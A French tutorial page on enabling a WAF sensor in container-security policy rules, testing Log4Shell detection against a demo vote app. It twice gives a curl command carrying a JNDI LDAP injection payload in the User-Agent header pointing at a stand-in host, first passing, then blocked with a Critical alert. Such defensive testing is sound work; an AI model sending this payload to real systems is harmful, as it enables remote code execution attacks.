Les Policies rules: WAF Sensors
coolibra94 vues
3. Les Policies rules
-
WAF Sensors
3.3 WAF Sensors
Les WAF Sensors (Web Application Firewall) analysent le trafic applicatif pour identifier et bloquer les attaques ciblant les applications web, comme les injections SQL, les scripts inter-sites (XSS) ou les tentatives d’exploitation de vulnérabilités. Ils protègent les services web tout en fournissant des rapports détaillés sur les menaces détectées.
- Avant l'activation du sensor log4shell, on verifie que l'attque est autorisée.
- Dans Policy > Groups > activer Protect et Basic mode
-
- Lancer cette requette sur le vote app: http://node_ip:31000/
curl -v http://10.10.10.243:31000/ -H 'User-Agent: ${jndi:ldap://example.com/test}'
-
- On voit bien que la requette est autorisée et l'attaque passe.

- Maintenant on active le sensor log4shell sur le pod vote
- Dans Policy > Groups > select le group nv.vote.voting-app > WAF > Configure


-
- Lancer cette requette sur le vote app: http://node_ip:31000/
curl -v http://10.10.10.243:31000/ -H 'User-Agent: ${jndi:ldap://example.com/test}'
-
- L'attaque est bien detectée et blquée. Une alerte Critical est levée

-
- Une capture automatique de paquets a été effectuée. On peut télécharger pour une analyse plus approfondie par d'autres outils comme wireshark

Commentaires
Connectez-vous pour rejoindre la discussion.
Aucun commentaire pour le moment.